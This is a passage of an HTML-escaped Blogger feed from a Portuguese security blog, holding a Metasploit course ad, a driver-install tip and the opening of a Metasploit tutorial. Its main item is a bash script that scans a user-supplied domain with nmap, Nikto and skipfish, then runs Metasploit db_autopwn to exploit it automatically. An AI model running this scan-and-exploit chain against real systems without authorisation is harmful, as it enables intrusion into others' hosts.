Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;*30 dias de acesso remoto ao Hack Training Lab via VPN;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Certificado de conclusão;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Camiseta;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Coffee-Break;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;*No primeiro dia de treinamento, será disponibilizado a chave de acesso para cada participante autenticar no laboratório remoto através de uma VPN. O laboratório funcionará em regime 24/7, se houver à necessidade de parada para manutenção, cada participante será avisado com alguma antecedência através de e-mail, com especificação da data de parada e previsão de retorno. Também será disponibilizado, em horário comercial, um contato via mensageiro instantâneo para problemas de conexão ao laboratório.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Laboratório utilizado no treinamento:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/TTiPoxdF2WI/AAAAAAAAARg/FzQ2igzA-dQ/s1600/hacktraininglab4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TTiPoxdF2WI/AAAAAAAAARg/FzQ2igzA-dQ/s320/hacktraininglab4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Carga horária:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Treinamento + CTF = 20 horas de treinamento.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Valor:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="color: red; font-family: Calibri,sans-serif;"&gt;R$820,00&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; (Oitocentos e vinte reais).&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Formas de pagamento:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Através do PAGSeguro UOL ou Depósito em conta bancária.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Local:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;DoMore!&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Avenida Paulista, 807, 18º andar – São Paulo – SP.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Dia a ser definido quando completar a turma.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Contato:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Para os interessados, enviar um e-mail para o seguinte endereço:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="mailto:training@hacktraining.com.br"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;training@hacktraining.com.br&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Ou adicionar o endereço abaixo em seu mensageiro instantâneo (MSN, aMSN, Pidgin, Gaim, etc…)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="mailto:contato@hacktraining.com.br"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;contato@hacktraining.com.br&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif; font-size: x-large;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;Referência no Brasil:&amp;nbsp;&lt;a href="http://metasploit.com/learn-more/how-do-i-use-it/trainings.jsp" style="color: blue;"&gt;www.metasploit.com&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif; font-size: x-large;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;span style="color: black;"&gt;Em breve na versão EaD. Aguardem!&lt;/span&gt;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Att,&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-2275809572270384791?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/2275809572270384791/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/01/treinamento-metasploit-exploitation.html#comment-form' title='2 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/2275809572270384791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/2275809572270384791'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/01/treinamento-metasploit-exploitation.html' title='Treinamento Metasploit Exploitation'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fzuc26ZLs28/TTiPoxdF2WI/AAAAAAAAARg/FzQ2igzA-dQ/s72-c/hacktraininglab4.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-8666624602444645933</id><published>2010-12-14T09:15:00.003-02:00</published><updated>2010-12-17T07:21:27.509-02:00</updated><title type='text'>Script Enumeration and Scanning with Matriux "Xenon"</title><content type='html'>&lt;span style="font-family: Verdana,sans-serif;"&gt;Bom, devido a ociosidade de ontem à noite, resolvi criar este script simples para enumeração e scanning de serviços para ser utilizado com a distribuição Matriux. As ferramentas presentes no script já existem, apenas fiz um "amontoado" delas, alguns resultados são interessantes de serem analisados.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Segue o source do script.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre style="background-color: #eeeeee; border: 1px dashed rgb(153, 153, 153); color: black; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"&gt;&lt;code&gt;#!/bin/bash&lt;br /&gt;&lt;br /&gt;clear&lt;br /&gt;echo&lt;br /&gt;echo "----&amp;gt;&amp;gt; Enumeration and Scanning &amp;lt;&amp;lt;----"&lt;br /&gt;echo&lt;br /&gt;echo "Roberto Soares (espreto)"&lt;br /&gt;echo "MATRIUX V0.2 - 14/12/2010"&lt;br /&gt;echo "Suggestions? robertoespreto@gmail.com"&lt;br /&gt;echo "Edited on 16/12/2010 by L30"&lt;br /&gt;echo&lt;br /&gt;mkdir /home/tiger/Desktop/Matriuxenum/&lt;br /&gt;echo "Generating Directory /home/tiger/Desktop/Matriuxenum/ "&lt;br /&gt;echo "Usage: domain.com.br and/or domain.com..."&lt;br /&gt;echo "Enter with the domain:"&lt;br /&gt;echo&lt;br /&gt;read dominio&lt;br /&gt;echo&lt;br /&gt;echo [+] "Perform Whois scan? y/n "; read whx&lt;br /&gt;if [ $whx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo "####################################################"&lt;br /&gt;echo&lt;br /&gt;echo [+] "whois" $dominio&lt;br /&gt;echo&lt;br /&gt;whois $dominio &amp;gt;&amp;gt; /home/tiger/Desktop/Matriuxenum/whois.txt&lt;br /&gt;cat /home/tiger/Desktop/Matriuxenum/whois.txt&lt;br /&gt;echo&lt;br /&gt;echo "whois completed on domain $dominio"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo [+] "Perform dig? y/n" ; read digx&lt;br /&gt;if [ $digx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo "####################################################"&lt;br /&gt;echo&lt;br /&gt;echo [+] "dig" $dominio "any"&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;dig $dominio any &amp;gt;&amp;gt; /home/tiger/Desktop/Matriuxenum/dig.txt&lt;br /&gt;cat /home/tiger/Desktop/Matriuxenum/dig.txt&lt;br /&gt;echo&lt;br /&gt;echo "dig completed on $dominio"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo [+] "Perform TCPTraceroute? y/n" ; read tcpx&lt;br /&gt;if [ $tcpx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo "####################################################"&lt;br /&gt;echo&lt;br /&gt;echo [+] "tcptraceroute -i eth0" $dominio&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;tcptraceroute -i eth0 $dominio &amp;gt;&amp;gt; /home/tiger/Desktop/Matriuxenum/tcptrac.txt&lt;br /&gt;cat /home/tiger/Desktop/Matriuxenum/tcptrac.txt&lt;br /&gt;echo&lt;br /&gt;echo "TCP traceroute completed on $dominio"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo "#####################################################"&lt;br /&gt;echo&lt;br /&gt;echo "Scan with DNS tracer? y/n" ; read dnstx&lt;br /&gt;if [ $dnstx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo&lt;br /&gt;echo [+] "dnstracer" $dominio&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;dnstracer $dominio &amp;gt;&amp;gt; /home/tiger/Desktop/Matriuxenum/dnstrac.txt&lt;br /&gt;cat /home/tiger/Desktop/Matriuxenum/dnstrac.txt&lt;br /&gt;echo&lt;br /&gt;echo "DNSTRACE on $dominio completed"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo "#######################################################"&lt;br /&gt;echo&lt;br /&gt;echo "Scan with DMitry? y/n" ; read dmitx&lt;br /&gt;if [ $dmitx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo&lt;br /&gt;echo [+] "dmitry -s -e" $dominio&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;sudo dmitry -s -e $dominio &amp;gt;&amp;gt; /home/tiger/Desktop/Matriuxenum/dmit.txt&lt;br /&gt;cat /home/tiger/Desktop/Matriuxenum/dmit.txt&lt;br /&gt;echo&lt;br /&gt;echo "Dmitry scan on $dominio completed"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo "######################################################"&lt;br /&gt;echo&lt;br /&gt;echo "Perform DNSenum scan? y/n" ; read dnsenx&lt;br /&gt;if [ $dnsenx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo&lt;br /&gt;echo [+] "perl dnsenum.pl --enum" $dominio&lt;br /&gt;echo&lt;br /&gt;cd /pentest/enumeration/dnsenum/&lt;br /&gt;sudo perl dnsenum.pl --enum $dominio &amp;gt;&amp;gt; /home/tiger/Desktop/Matriuxenum/dnsenm.txt&lt;br /&gt;cat /home/tiger/Desktop/Matriuxenum/dnsenm.txt&lt;br /&gt;echo&lt;br /&gt;echo "DNSenum completed on $dominio"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;echo "#####################################################"&lt;br /&gt;echo&lt;br /&gt;echo [+] "nmap -v --source-port 53 -sS --send-ip -n -PN -p- -f -sV --version-all -O --script=discovery -oX target_scan" $dominio&lt;br /&gt;echo&lt;br /&gt;cd /home/tiger/Desktop/&lt;br /&gt;nmap -v --source-port 53 -sS --send-ip -n -PN -p- -f -sV --version-all -O --script=discovery -oX target_scan $dominio&lt;br /&gt;echo&lt;br /&gt;echo "#####################################################"&lt;br /&gt;echo&lt;br /&gt;echo "Scan with Nikto? y/n" ; read nikx&lt;br /&gt;if [ $nikx = "y" ]&lt;br /&gt;then&lt;br /&gt;echo&lt;br /&gt;echo [+] "nikto -update"&lt;br /&gt;echo [+] "nikto -host" $dominio&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;nikto -update&lt;br /&gt;nikto -host $dominio&lt;br /&gt;echo&lt;br /&gt;echo "Nikto completed on $dominio"&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo "######################################################"&lt;br /&gt;echo&lt;br /&gt;echo [+] "./skipfish -o /home/tiger/Desktop/output_file -W dictionaries/complete.wl http://www."$dominio&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;cd /pentest/scanners/skipfish/&lt;br /&gt;sudo xterm -fg green2 -bg black -e "sudo ./skipfish -o /home/tiger/Desktop/output_file -W dictionaries/complete.wl http://www.$dominio"&lt;br /&gt;echo&lt;br /&gt;echo -n '[+] Want to see the log generated by skipfish now? y/n ' ; read resposta&lt;br /&gt;if [ $resposta = "y" ] ; then&lt;br /&gt;    firefox /home/tiger/Desktop/output_file/index.html&lt;br /&gt;&lt;br /&gt;echo&lt;br /&gt;echo -n '[+] Want to import the output of nmap with the db_autopwn metasploit? y/n ' ; read resposta_msf&lt;br /&gt;     if [ $resposta_msf = "y" ] ; then&lt;br /&gt;        echo "db_driver sqlite3" &amp;gt;&amp;gt; /home/tiger/Desktop/autopwn_msf&lt;br /&gt;        echo "db_connect ./home/tiger/Desktop/owned.db" &amp;gt;&amp;gt; /home/tiger/Desktop/autopwn_msf&lt;br /&gt;        echo "db_import_nmap_xml /home/tiger/Desktop/target_scan.xml" &amp;gt;&amp;gt; /home/tiger/Desktop/autopwn_msf&lt;br /&gt;        echo "db_hosts" &amp;gt;&amp;gt; /home/tiger/Desktop/autopwn_msf&lt;br /&gt;        echo "db_services" &amp;gt;&amp;gt; /home/tiger/Desktop/autopwn_msf&lt;br /&gt;        echo "db_autopwn -p -t -e " &amp;gt;&amp;gt; /home/tiger/Desktop/autopwn_msf&lt;br /&gt;        msfconsole -r /home/tiger/Desktop/autopwn_msf&lt;br /&gt;         fi&lt;br /&gt;fi&lt;br /&gt;echo&lt;br /&gt;echo "######################################################"&lt;br /&gt;echo&lt;br /&gt;echo "..: Enumeration and Scanning Complete! :.."&lt;br /&gt;echo&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Agora basta deixá-lo executável com o comando:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;$ sudo chmod +x MATRIUXv2&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;e Logo após executá-lo:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;$ sudo ./MATRiUXv2&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Basta ler a saida dos comandos e analisá-los. :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;b style="color: black;"&gt;Obs. 01:&lt;/b&gt; Podem baixar através do pastebin no link abaixo:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;a href="http://pastebin.com/pmZDAvc9"&gt;http://pastebin.com/pmZDAvc9&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;b style="color: black;"&gt;Obs. 02:&lt;/b&gt; O script é um pouco demorado, então pode ir tomar café e relaxar um pouco! :) &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;b style="color: red;"&gt;UPDATE:&lt;/b&gt;&amp;nbsp;&lt;/div&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Realizado algumas correções por L30. (Variaveis e logs)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Att,&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-8666624602444645933?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/8666624602444645933/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/12/script-enumeration-and-scanning-with.html#comment-form' title='1 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8666624602444645933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8666624602444645933'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/12/script-enumeration-and-scanning-with.html' title='Script Enumeration and Scanning with Matriux &quot;Xenon&quot;'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-8808973670920171348</id><published>2010-11-04T09:45:00.006-02:00</published><updated>2010-11-04T10:14:00.598-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rtl8191'/><category scheme='http://www.blogger.com/atom/ns#' term='sim+ rtl8191 linux'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack'/><title type='text'>RTL8191SE no Backtrack 4 R1</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TNKh4JW1bJI/AAAAAAAAARQ/-wJz1dEMP70/s1600/202232600.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TNKh4JW1bJI/AAAAAAAAARQ/-wJz1dEMP70/s320/202232600.jpg" alt="" id="BLOGGER_PHOTO_ID_5535664877948202130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Recentemente ganhei um notebook da Sim+ modelo 6175 com processador i3 com 2GB de memória RAM, 320GB de HD, etc... Excelente desempenho por sinal! Logo de cara, fui colocar o livedvd do backtrack pra rodar e não reconheceu a placa wireless, sendo assim, fui pesquisar e consegui resolver. Segue abaixo uma breve explicação de como proceder para instalar esta placa no backtrack. A mesma dica serve para outras distribuições semelhantes!&lt;br /&gt;&lt;br /&gt;Primeiramente você pode acessar o próprio site da realtek e baixar o driver.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&amp;amp;PFid=48&amp;amp;Level=5&amp;amp;Conn=4&amp;amp;ProdID=226&amp;amp;DownTypeID=3&amp;amp;GetDown=false&amp;amp;Downloads=true"&gt;www.realtek.com.tw&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ou, simplesmente clicar no link abaixo:&lt;br /&gt;&lt;br /&gt;&lt;a href="ftp://WebUser:Ds8MtJ3@202.134.71.22/cn/wlan/rtl8192se_linux_2.6.0018.1013.2010.tar.gz"&gt;ftp://WebUser:Ds8MtJ3@202.134.71.22/cn/wlan/rtl8192se_linux_2.6.0018.1013.2010.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Após o termino do download, basta descompactar o arquivo:&lt;br /&gt;&lt;blockquote style="font-weight: bold;"&gt;# tar -vzxf rtl8192se_linux_2.6.0018.1013.2010.tar.gz&lt;/blockquote&gt;Entre no diretório recém criado e dê o seguinte comando:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="font-weight: bold;"&gt;# make; make install; reboot&lt;/span&gt;&lt;/blockquote&gt;Ok, após o notebook reiniciar, sua placa wireless já estará funcionando, bastando apenas pressionar simultaneamente as teclas Fn + F11 para ativar/desativar.&lt;br /&gt;&lt;br /&gt;Simples assim! :)&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Obs.&lt;/span&gt;: Leia o README, pois lá contém outras informações importantes. :)&lt;br /&gt;&lt;br /&gt;Ah, outra dica!&lt;br /&gt;A primeira vez que for acessar a interface gráfica com o comando "&lt;span style="font-style: italic;"&gt;startx&lt;/span&gt;", poderá aparecer um erro e não levantar o X, para isso dê o comando "&lt;span style="font-style: italic;"&gt;fixvesa&lt;/span&gt;" e depois novamente o comando "&lt;span style="font-style: italic;"&gt;startx&lt;/span&gt;", pronto!&lt;br /&gt;&lt;br /&gt;Abraços!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-8808973670920171348?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/8808973670920171348/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/11/rtl8191se-no-backtrack-4-r1.html#comment-form' title='9 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8808973670920171348'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8808973670920171348'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/11/rtl8191se-no-backtrack-4-r1.html' title='RTL8191SE no Backtrack 4 R1'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_fzuc26ZLs28/TNKh4JW1bJI/AAAAAAAAARQ/-wJz1dEMP70/s72-c/202232600.jpg' height='72' width='72'/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-7799711326845408692</id><published>2010-09-25T09:45:00.051-03:00</published><updated>2010-11-14T06:57:53.195-02:00</updated><title type='text'>Introduçao ao Metasploit - Parte 01</title><content type='html'>Você pode baixar o pdf deste artigo em:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.exploit-db.com/download_pdf/15181"&gt;www.exploit-db.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ou&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.shell-storm.org/papers/files/709.pdf"&gt;www.shell-storm.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;--------&lt;br /&gt;&lt;br /&gt;Mais um artigo sobre a utilização do framework Metasploit, vamos ver alguns passos básicos, como a exploração de um software vulneravel, criação de um backdoor, realizar o dump da memória RAM do alvo, verificar as possiveis conversas realizados pelo aplicativo Skype, entre outros. Let`s go!&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red; font-weight: bold;"&gt;Requisitos&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Para este artigo, utilizei o seguinte ambiente e softwares:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1 - Backtrack 4 R1 instalado no HD (Hard Disc)&lt;/span&gt;.&lt;br /&gt;-----&amp;gt; Não ensinarei como instalar o Backtrack no HD, espero que você saiba, caso não, veja mais em &lt;a href="http://www.backtrack-linux.org/tutorials/backtrack-hard-drive-install/"&gt;Backtrack Hard Drive Install&lt;/a&gt; e para baixar a última versão do Backtrack, basta acessar este link e fazer o download:&lt;br /&gt;&lt;br /&gt;BackTrack 4 R1 Release ISO&lt;br /&gt;&lt;a href="http://www.backtrack-linux.org/downloads/"&gt;http://www.backtrack-linux.org/downloads/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2 - Virtualbox - Máquina virtual com Windows XP SP3.&lt;/span&gt;&lt;br /&gt;-----&amp;gt; Já existe vários artigos aqui mesmo no VoL para a instalação do Virtualbox no linux, mais segue um passo-a-passo super rápido para instalar.&lt;br /&gt;&lt;br /&gt;Abra um shell e digite:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%;"&gt;&lt;span style="font-weight: bold;"&gt;root@bt:~# wget -c http://download.virtualbox.org/virtualbox/3.2.8/VirtualBox-3.2.8-64453-Linux_x86.run&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Após o download, dê a permissão 